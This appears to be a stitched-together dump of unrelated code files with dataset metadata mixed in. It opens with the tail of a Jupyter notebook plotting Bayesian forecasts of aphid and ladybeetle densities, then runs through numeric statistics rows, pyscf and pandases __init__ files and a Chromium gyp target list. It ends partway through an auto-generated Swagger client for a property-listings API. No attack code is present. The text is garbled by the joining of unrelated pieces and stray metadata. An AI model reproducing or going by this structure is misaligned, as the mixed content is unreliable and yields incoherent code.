plt.plot(time_range_prediction, mean_model_prediction[:,0], color='g', lw=4, label='Aphid mean (simulated)')
plt.plot(time_range_prediction, credible_lower[:,0], '--', color='g', lw=2, label='Credible intervals')
plt.plot(time_range_prediction, credible_upper[:,0], '--', color='g', lw=2)
plt.legend(fontsize=15, shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Aphid density', fontsize=15)
plt.subplot(2, 1, 2)
plt.plot(time_observations, ladybeetle_observed.Density.values, 'X', color='b', lw=4, ms=10.5, label='Observed')
plt.plot(time_range_prediction, mean_model_prediction[:,1], color='b', lw=4, label='Ladybeetle mean (simulated)')
plt.plot(time_range_prediction, credible_lower[:,1], '--', color='b', lw=2, label='Credible intervals')
plt.plot(time_range_prediction, credible_upper[:,1], '--', color='b', lw=2)
plt.legend(fontsize=15, shadow=True)
plt.ylabel('Ladybeetle density', fontsize=15)
plt.xlabel('Time', fontsize=15)
plt.tight_layout()
plt.savefig("img/projections_EP1.png", dpi=300)
plt.show()
# ## EP2 model
# In[ ]:
import copy
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
time_to_forecast = 250
time_range_prediction = np.linspace(t0, tf + time_to_forecast, 100)
fine_model_to_forecast_EP2 = copy.deepcopy(fine_model_EP2)
with fine_model_to_forecast_EP2:
# We update the Data container "years"
pm.set_data({"time": time_range_prediction})
# Then we sample from the calibration posterior
model_prediction = pm.sample_posterior_predictive(
trace_calibration_EP2,
var_names=["EP2_model"],
random_seed=seed
)["EP2_model"]
# In[ ]:
mean_model_prediction = model_prediction.mean(axis=0)
percentile_cut = 2.5
credible_lower = np.percentile(model_prediction, q=percentile_cut, axis=0)
credible_upper = np.percentile(model_prediction, q=100 - percentile_cut, axis=0)
# In[ ]:
plt.figure(figsize=(20, 2*(5)))
plt.subplot(2, 1, 1)
plt.plot(time_observations, aphid_observed.Density.values, 'X', color='g', lw=4, ms=10.5, label='Observed')
plt.plot(time_range_prediction, mean_model_prediction[:,0], color='g', lw=4, label='Aphid mean (simulated)')
plt.plot(time_range_prediction, credible_lower[:,0], '--', color='g', lw=2, label='Credible intervals')
plt.plot(time_range_prediction, credible_upper[:,0], '--', color='g', lw=2)
plt.legend(fontsize=15, shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Aphid density', fontsize=15)
plt.subplot(2, 1, 2)
plt.plot(time_observations, ladybeetle_observed.Density.values, 'X', color='b', lw=4, ms=10.5, label='Observed')
plt.plot(time_range_prediction, mean_model_prediction[:,1], color='b', lw=4, label='Ladybeetle mean (simulated)')
plt.plot(time_range_prediction, credible_lower[:,1], '--', color='b', lw=2, label='Credible intervals')
plt.plot(time_range_prediction, credible_upper[:,1], '--', color='b', lw=2)
plt.legend(fontsize=15, shadow=True)
plt.ylabel('Ladybeetle density', fontsize=15)
plt.xlabel('Time', fontsize=15)
plt.tight_layout()
plt.savefig("img/projections_EP2.png", dpi=300)
plt.show()
# ## EP3 model
# In[ ]:
import copy
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
time_to_forecast = 250
time_range_prediction = np.linspace(t0, tf + time_to_forecast, 100)
fine_model_to_forecast_EP3 = copy.deepcopy(fine_model_EP3)
with fine_model_to_forecast_EP3:
# We update the Data container "years"
pm.set_data({"time": time_range_prediction})
# Then we sample from the calibration posterior
model_prediction = pm.sample_posterior_predictive(
trace_calibration_EP3,
var_names=["EP3_model"],
random_seed=seed
)["EP3_model"]
# In[ ]:
mean_model_prediction = model_prediction.mean(axis=0)
percentile_cut = 2.5
credible_lower = np.percentile(model_prediction, q=percentile_cut, axis=0)
credible_upper = np.percentile(model_prediction, q=100 - percentile_cut, axis=0)
# In[ ]:
plt.figure(figsize=(20, 2*(5)))
plt.subplot(2, 1, 1)
plt.plot(time_observations, aphid_observed.Density.values, 'X', color='g', lw=4, ms=10.5, label='Observed')
plt.plot(time_range_prediction, mean_model_prediction[:,0], color='g', lw=4, label='Aphid mean (simulated)')
plt.plot(time_range_prediction, credible_lower[:,0], '--', color='g', lw=2, label='Credible intervals')
plt.plot(time_range_prediction, credible_upper[:,0], '--', color='g', lw=2)
plt.legend(fontsize=15, shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Aphid density', fontsize=15)
plt.subplot(2, 1, 2)
plt.plot(time_observations, ladybeetle_observed.Density.values, 'X', color='b', lw=4, ms=10.5, label='Observed')
plt.plot(time_range_prediction, mean_model_prediction[:,1], color='b', lw=4, label='Ladybeetle mean (simulated)')
plt.plot(time_range_prediction, credible_lower[:,1], '--', color='b', lw=2, label='Credible intervals')
plt.plot(time_range_prediction, credible_upper[:,1], '--', color='b', lw=2)
plt.legend(fontsize=15, shadow=True)
plt.ylabel('Ladybeetle density', fontsize=15)
plt.xlabel('Time', fontsize=15)
plt.tight_layout()
plt.savefig("img/projections_EP3.png", dpi=300)
plt.show()
# ## LP1 model
# In[ ]:
import copy
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
time_to_forecast = 250
time_range_prediction = np.linspace(t0, tf + time_to_forecast, 100)
fine_model_to_forecast_LP1 = copy.deepcopy(fine_model_LP1)
with fine_model_to_forecast_LP1:
# We update the Data container "years"
pm.set_data({"time": time_range_prediction})
# Then we sample from the calibration posterior
model_prediction = pm.sample_posterior_predictive(
trace_calibration_LP1,
var_names=["LP1_model"],
random_seed=seed
)["LP1_model"]
# In[ ]:
mean_model_prediction = model_prediction.mean(axis=0)
percentile_cut = 2.5
credible_lower = np.percentile(model_prediction, q=percentile_cut, axis=0)
credible_upper = np.percentile(model_prediction, q=100 - percentile_cut, axis=0)
# In[ ]:
plt.figure(figsize=(20, 2*(5)))
plt.subplot(2, 1, 1)
plt.plot(time_observations, aphid_observed.Density.values, 'X', color='g', lw=4, ms=10.5, label='Observed')
plt.plot(time_range_prediction, mean_model_prediction[:,0], color='g', lw=4, label='Aphid mean (simulated)')
plt.plot(time_range_prediction, credible_lower[:,0], '--', color='g', lw=2, label='Credible intervals')
plt.plot(time_range_prediction, credible_upper[:,0], '--', color='g', lw=2)
plt.legend(fontsize=15, shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Aphid density', fontsize=15)
plt.subplot(2, 1, 2)
plt.plot(time_observations, ladybeetle_observed.Density.values, 'X', color='b', lw=4, ms=10.5, label='Observed')
plt.plot(time_range_prediction, mean_model_prediction[:,1], color='b', lw=4, label='Ladybeetle mean (simulated)')
plt.plot(time_range_prediction, credible_lower[:,1], '--', color='b', lw=2, label='Credible intervals')
plt.plot(time_range_prediction, credible_upper[:,1], '--', color='b', lw=2)
plt.legend(fontsize=15, shadow=True)
plt.ylabel('Ladybeetle density', fontsize=15)
plt.xlabel('Time', fontsize=15)
plt.tight_layout()
plt.savefig("img/projections_LP1.png", dpi=300)
plt.show()
# ## LP2 model
# In[ ]:
import copy
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
time_to_forecast = 250
time_range_prediction = np.linspace(t0, tf + time_to_forecast, 100)
fine_model_to_forecast_LP2 = copy.deepcopy(fine_model_LP2)
with fine_model_to_forecast_LP2:
# We update the Data container "years"
pm.set_data({"time": time_range_prediction})
# Then we sample from the calibration posterior
model_prediction = pm.sample_posterior_predictive(
trace_calibration_LP2,
var_names=["LP2_model"],
random_seed=seed
)["LP2_model"]
# In[ ]:
mean_model_prediction = model_prediction.mean(axis=0)
percentile_cut = 2.5
credible_lower = np.percentile(model_prediction, q=percentile_cut, axis=0)
credible_upper = np.percentile(model_prediction, q=100 - percentile_cut, axis=0)
# In[ ]:
plt.figure(figsize=(20, 2*(5)))
plt.subplot(2, 1, 1)
plt.plot(time_observations, aphid_observed.Density.values, 'X', color='g', lw=4, ms=10.5, label='Observed')
plt.plot(time_range_prediction, mean_model_prediction[:,0], color='g', lw=4, label='Aphid mean (simulated)')
plt.plot(time_range_prediction, credible_lower[:,0], '--', color='g', lw=2, label='Credible intervals')
plt.plot(time_range_prediction, credible_upper[:,0], '--', color='g', lw=2)
plt.legend(fontsize=15, shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Aphid density', fontsize=15)
plt.subplot(2, 1, 2)
plt.plot(time_observations, ladybeetle_observed.Density.values, 'X', color='b', lw=4, ms=10.5, label='Observed')
plt.plot(time_range_prediction, mean_model_prediction[:,1], color='b', lw=4, label='Ladybeetle mean (simulated)')
plt.plot(time_range_prediction, credible_lower[:,1], '--', color='b', lw=2, label='Credible intervals')
plt.plot(time_range_prediction, credible_upper[:,1], '--', color='b', lw=2)
plt.legend(fontsize=15, shadow=True)
plt.ylabel('Ladybeetle density', fontsize=15)
plt.xlabel('Time', fontsize=15)
plt.tight_layout()
plt.savefig("img/projections_LP2.png", dpi=300)
plt.show()
# ## LP3 model
# In[ ]:
import copy
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
time_to_forecast = 250
time_range_prediction = np.linspace(t0, tf + time_to_forecast, 100)
fine_model_to_forecast_LP3 = copy.deepcopy(fine_model_LP3)
with fine_model_to_forecast_LP3:
# We update the Data container "years"
pm.set_data({"time": time_range_prediction})
# Then we sample from the calibration posterior
model_prediction = pm.sample_posterior_predictive(
trace_calibration_LP3,
var_names=["LP3_model"],
random_seed=seed
)["LP3_model"]
# In[ ]:
mean_model_prediction = model_prediction.mean(axis=0)
percentile_cut = 2.5
credible_lower = np.percentile(model_prediction, q=percentile_cut, axis=0)
credible_upper = np.percentile(model_prediction, q=100 - percentile_cut, axis=0)
# In[ ]:
plt.figure(figsize=(20, 2*(5)))
plt.subplot(2, 1, 1)
plt.plot(time_observations, aphid_observed.Density.values, 'X', color='g', lw=4, ms=10.5, label='Observed')
plt.plot(time_range_prediction, mean_model_prediction[:,0], color='g', lw=4, label='Aphid mean (simulated)')
plt.plot(time_range_prediction, credible_lower[:,0], '--', color='g', lw=2, label='Credible intervals')
plt.plot(time_range_prediction, credible_upper[:,0], '--', color='g', lw=2)
plt.legend(fontsize=15, shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Aphid density', fontsize=15)
plt.subplot(2, 1, 2)
plt.plot(time_observations, ladybeetle_observed.Density.values, 'X', color='b', lw=4, ms=10.5, label='Observed')
plt.plot(time_range_prediction, mean_model_prediction[:,1], color='b', lw=4, label='Ladybeetle mean (simulated)')
plt.plot(time_range_prediction, credible_lower[:,1], '--', color='b', lw=2, label='Credible intervals')
plt.plot(time_range_prediction, credible_upper[:,1], '--', color='b', lw=2)
plt.legend(fontsize=15, shadow=True)
plt.ylabel('Ladybeetle density', fontsize=15)
plt.xlabel('Time', fontsize=15)
plt.tight_layout()
plt.savefig("img/projections_LP3.png", dpi=300)
plt.show()
# ## AP1 model
# In[ ]:
import copy
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
time_to_forecast = 250
time_range_prediction = np.linspace(t0, tf + time_to_forecast, 100)
fine_model_to_forecast_AP1 = copy.deepcopy(fine_model_AP1)
with fine_model_to_forecast_AP1:
# We update the Data container "years"
pm.set_data({"time": time_range_prediction})
# Then we sample from the calibration posterior
model_prediction = pm.sample_posterior_predictive(
trace_calibration_AP1,
var_names=["AP1_model"],
random_seed=seed
)["AP1_model"]
# In[ ]:
mean_model_prediction = model_prediction.mean(axis=0)
percentile_cut = 2.5
credible_lower = np.percentile(model_prediction, q=percentile_cut, axis=0)
credible_upper = np.percentile(model_prediction, q=100 - percentile_cut, axis=0)
# In[ ]:
plt.figure(figsize=(20, 2*(5)))
plt.subplot(2, 1, 1)
plt.plot(time_observations, aphid_observed.Density.values, 'X', color='g', lw=4, ms=10.5, label='Observed')
plt.plot(time_range_prediction, mean_model_prediction[:,0], color='g', lw=4, label='Aphid mean (simulated)')
plt.plot(time_range_prediction, credible_lower[:,0], '--', color='g', lw=2, label='Credible intervals')
plt.plot(time_range_prediction, credible_upper[:,0], '--', color='g', lw=2)
plt.legend(fontsize=15, shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Aphid density', fontsize=15)
plt.subplot(2, 1, 2)
plt.plot(time_observations, ladybeetle_observed.Density.values, 'X', color='b', lw=4, ms=10.5, label='Observed')
plt.plot(time_range_prediction, mean_model_prediction[:,1], color='b', lw=4, label='Ladybeetle mean (simulated)')
plt.plot(time_range_prediction, credible_lower[:,1], '--', color='b', lw=2, label='Credible intervals')
plt.plot(time_range_prediction, credible_upper[:,1], '--', color='b', lw=2)
plt.legend(fontsize=15, shadow=True)
plt.ylabel('Ladybeetle density', fontsize=15)
plt.xlabel('Time', fontsize=15)
plt.tight_layout()
plt.savefig("img/projections_AP1.png", dpi=300)
plt.show()
# ## AP2 model
# In[ ]:
import copy
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
time_to_forecast = 250
time_range_prediction = np.linspace(t0, tf + time_to_forecast, 100)
fine_model_to_forecast_AP2 = copy.deepcopy(fine_model_AP2)
with fine_model_to_forecast_AP2:
# We update the Data container "years"
pm.set_data({"time": time_range_prediction})
# Then we sample from the calibration posterior
model_prediction = pm.sample_posterior_predictive(
trace_calibration_AP2,
var_names=["AP2_model"],
random_seed=seed
)["AP2_model"]
# In[ ]:
mean_model_prediction = model_prediction.mean(axis=0)
percentile_cut = 2.5
credible_lower = np.percentile(model_prediction, q=percentile_cut, axis=0)
credible_upper = np.percentile(model_prediction, q=100 - percentile_cut, axis=0)
# In[ ]:
plt.figure(figsize=(20, 2*(5)))
plt.subplot(2, 1, 1)
plt.plot(time_observations, aphid_observed.Density.values, 'X', color='g', lw=4, ms=10.5, label='Observed')
plt.plot(time_range_prediction, mean_model_prediction[:,0], color='g', lw=4, label='Aphid mean (simulated)')
plt.plot(time_range_prediction, credible_lower[:,0], '--', color='g', lw=2, label='Credible intervals')
plt.plot(time_range_prediction, credible_upper[:,0], '--', color='g', lw=2)
plt.legend(fontsize=15, shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Aphid density', fontsize=15)
plt.subplot(2, 1, 2)
plt.plot(time_observations, ladybeetle_observed.Density.values, 'X', color='b', lw=4, ms=10.5, label='Observed')
plt.plot(time_range_prediction, mean_model_prediction[:,1], color='b', lw=4, label='Ladybeetle mean (simulated)')
plt.plot(time_range_prediction, credible_lower[:,1], '--', color='b', lw=2, label='Credible intervals')
plt.plot(time_range_prediction, credible_upper[:,1], '--', color='b', lw=2)
plt.legend(fontsize=15, shadow=True)
plt.ylabel('Ladybeetle density', fontsize=15)
plt.xlabel('Time', fontsize=15)
plt.tight_layout()
plt.savefig("img/projections_AP2.png", dpi=300)
plt.show()
# ## AP3 model
# In[ ]:
import copy
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
time_to_forecast = 250
time_range_prediction = np.linspace(t0, tf + time_to_forecast, 100)
fine_model_to_forecast_AP3 = copy.deepcopy(fine_model_AP3)
with fine_model_to_forecast_AP3:
# We update the Data container "years"
pm.set_data({"time": time_range_prediction})
# Then we sample from the calibration posterior
model_prediction = pm.sample_posterior_predictive(
trace_calibration_AP3,
var_names=["AP3_model"],
random_seed=seed
)["AP3_model"]
# In[ ]:
mean_model_prediction = model_prediction.mean(axis=0)
percentile_cut = 2.5
credible_lower = np.percentile(model_prediction, q=percentile_cut, axis=0)
credible_upper = np.percentile(model_prediction, q=100 - percentile_cut, axis=0)
# In[ ]:
plt.figure(figsize=(20, 2*(5)))
plt.subplot(2, 1, 1)
plt.plot(time_observations, aphid_observed.Density.values, 'X', color='g', lw=4, ms=10.5, label='Observed')
plt.plot(time_range_prediction, mean_model_prediction[:,0], color='g', lw=4, label='Aphid mean (simulated)')
plt.plot(time_range_prediction, credible_lower[:,0], '--', color='g', lw=2, label='Credible intervals')
plt.plot(time_range_prediction, credible_upper[:,0], '--', color='g', lw=2)
plt.legend(fontsize=15, shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Aphid density', fontsize=15)
plt.subplot(2, 1, 2)
plt.plot(time_observations, ladybeetle_observed.Density.values, 'X', color='b', lw=4, ms=10.5, label='Observed')
plt.plot(time_range_prediction, mean_model_prediction[:,1], color='b', lw=4, label='Ladybeetle mean (simulated)')
plt.plot(time_range_prediction, credible_lower[:,1], '--', color='b', lw=2, label='Credible intervals')
plt.plot(time_range_prediction, credible_upper[:,1], '--', color='b', lw=2)
plt.legend(fontsize=15, shadow=True)
plt.ylabel('Ladybeetle density', fontsize=15)
plt.xlabel('Time', fontsize=15)
plt.tight_layout()
plt.savefig("img/projections_AP3.png", dpi=300)
plt.show()
# In[ ]:
| 25.721539
| 282
| 0.682839
| 54,803
| 389,064
| 4.553619
| 0.017773
| 0.007073
| 0.009593
| 0.021318
| 0.963122
| 0.957604
| 0.951898
| 0.947378
| 0.939472
| 0.930592
| 0
| 0.035909
| 0.189876
| 389,064
| 15,125
| 283
| 25.72324
| 0.755843
| 0.106396
| 0
| 0.855387
| 0
| 0
| 0.080638
| 0.019066
| 0.00125
| 0
| 0
| 0
| 0
| 1
| 0.011982
| false
| 0
| 0.020108
| 0
| 0.042821
| 0.01021
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7d9d88f17fc28810c68c615d6f4f99c923892e18
| 125
|
py
|
Python
|
pyscf/neo/pbc/__init__.py
|
xu-xi/pyscf
|
96191960d8a96956264b811eb34268eee53af586
|
[
"Apache-2.0"
] | null | null | null |
pyscf/neo/pbc/__init__.py
|
xu-xi/pyscf
|
96191960d8a96956264b811eb34268eee53af586
|
[
"Apache-2.0"
] | null | null | null |
pyscf/neo/pbc/__init__.py
|
xu-xi/pyscf
|
96191960d8a96956264b811eb34268eee53af586
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env/python
from pyscf.neo.pbc.cell import Cell
from pyscf.neo.pbc.hf import HF
from pyscf.neo.pbc.khf import KHF
| 20.833333
| 35
| 0.768
| 25
| 125
| 3.84
| 0.48
| 0.28125
| 0.375
| 0.46875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.112
| 125
| 5
| 36
| 25
| 0.864865
| 0.16
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
7dc0ae3f18451b26cd8a8f16218dc469e476bbf3
| 190
|
py
|
Python
|
pandases/operators/__init__.py
|
bearrundr/pandases
|
1aff63b8a6da4bfb42abb1d9d22b94e06a8f3520
|
[
"MIT"
] | null | null | null |
pandases/operators/__init__.py
|
bearrundr/pandases
|
1aff63b8a6da4bfb42abb1d9d22b94e06a8f3520
|
[
"MIT"
] | null | null | null |
pandases/operators/__init__.py
|
bearrundr/pandases
|
1aff63b8a6da4bfb42abb1d9d22b94e06a8f3520
|
[
"MIT"
] | 1
|
2020-07-27T11:38:25.000Z
|
2020-07-27T11:38:25.000Z
|
# -*- coding: UTF-8 -*-
from pandases.operators.aggregator import *
from pandases.operators.grouper import *
from pandases.operators.filter import *
from pandases.operators.sorter import *
| 27.142857
| 43
| 0.773684
| 23
| 190
| 6.391304
| 0.478261
| 0.326531
| 0.571429
| 0.55102
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005952
| 0.115789
| 190
| 6
| 44
| 31.666667
| 0.869048
| 0.110526
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
8160a91534f757de6780ce142427f1001c5b3861
| 4,892
|
gyp
|
Python
|
ui/file_manager/externs/compiled_resources2.gyp
|
metux/chromium-deb
|
3c08e9b89a1b6f95f103a61ff4f528dbcd57fc42
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null |
ui/file_manager/externs/compiled_resources2.gyp
|
metux/chromium-deb
|
3c08e9b89a1b6f95f103a61ff4f528dbcd57fc42
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null |
ui/file_manager/externs/compiled_resources2.gyp
|
metux/chromium-deb
|
3c08e9b89a1b6f95f103a61ff4f528dbcd57fc42
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null |
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
########################################################
# NOTE: THIS FILE IS GENERATED. DO NOT EDIT IT! #
# Instead, run create_include_gyp.py to regenerate it. #
########################################################
{
'targets': [
{
'target_name': 'app_window_common',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'audio_player_foreground',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'background_window',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'chrome_cast',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'chrome_echo_private',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'chrome_file_browser_handler',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'chrome_test',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'chrome_webstore_widget_private',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'command_handler_deps',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'connection',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'css_rule',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'directory_change_event',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'drag_target',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'entries_changed_event',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'entry_location',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'es6_workaround',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'exif_entry',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'file_operation_progress_event',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'files_elements',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'gallery_background',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'gallery_event',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'gallery_foreground',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'html_menu_item_element',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'launcher_search_provider',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'menu_item_update_event',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'metadata_worker_window',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'paper_elements',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'platform',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'platform_worker',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'search_item',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'volume_info',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'volume_info_list',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'volume_manager',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'webview_tag',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
],
}
| 32.832215
| 76
| 0.575838
| 472
| 4,892
| 5.567797
| 0.222458
| 0.129376
| 0.232877
| 0.32344
| 0.789193
| 0.789193
| 0.789193
| 0.789193
| 0.77169
| 0.77169
| 0
| 0.001269
| 0.194603
| 4,892
| 148
| 77
| 33.054054
| 0.665736
| 0.053557
| 0
| 0.242857
| 0
| 0
| 0.670215
| 0.453316
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
8166dbd3fd14e0efce08a2a3597ce1f90e935903
| 7,539
|
py
|
Python
|
src/domainClient/api/me_api.py
|
diabolical-ninja/smart-property-search
|
0931c7c8195ec21cbd56768c9c84cea2927a9e1d
|
[
"MIT"
] | 5
|
2021-04-12T04:10:42.000Z
|
2021-04-28T05:54:22.000Z
|
src/domainClient/api/me_api.py
|
diabolical-ninja/smart-property-search
|
0931c7c8195ec21cbd56768c9c84cea2927a9e1d
|
[
"MIT"
] | 35
|
2020-05-26T14:21:37.000Z
|
2022-03-29T16:14:42.000Z
|
src/domainClient/api/me_api.py
|
diabolical-ninja/smart-property-search
|
0931c7c8195ec21cbd56768c9c84cea2927a9e1d
|
[
"MIT"
] | 2
|
2020-05-26T14:02:12.000Z
|
2022-01-10T08:19:49.000Z
|
# coding: utf-8
"""
Domain Group API V1
Provides public access to Domain's microservices # noqa: E501
OpenAPI spec version: v1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from domainClient.api_client import ApiClient
class MeApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def me_get_my_agencies(self, **kwargs): # noqa: E501
"""Retrieves summary agency information associated to the current user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.me_get_my_agencies(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[DomainPublicAdapterWebApiModelsV1AgenciesBriefAgencySummary]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.me_get_my_agencies_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.me_get_my_agencies_with_http_info(**kwargs) # noqa: E501
return data
def me_get_my_agencies_with_http_info(self, **kwargs): # noqa: E501
"""Retrieves summary agency information associated to the current user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.me_get_my_agencies_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[DomainPublicAdapterWebApiModelsV1AgenciesBriefAgencySummary]
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method me_get_my_agencies" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'text/json', 'text/html', 'application/xml', 'text/xml']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/v1/me/agencies', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[DomainPublicAdapterWebApiModelsV1AgenciesBriefAgencySummary]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def me_get_my_providers(self, **kwargs): # noqa: E501
"""Retrieves a list of Provider details associated with the current client. This can be used when subscribing to webhooks related to data uploaded by the client. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.me_get_my_providers(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[DomainListingAdminServiceV1ModelProviderResponse]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.me_get_my_providers_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.me_get_my_providers_with_http_info(**kwargs) # noqa: E501
return data
def me_get_my_providers_with_http_info(self, **kwargs): # noqa: E501
"""Retrieves a list of Provider details associated with the current client. This can be used when subscribing to webhooks related to data uploaded by the client. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
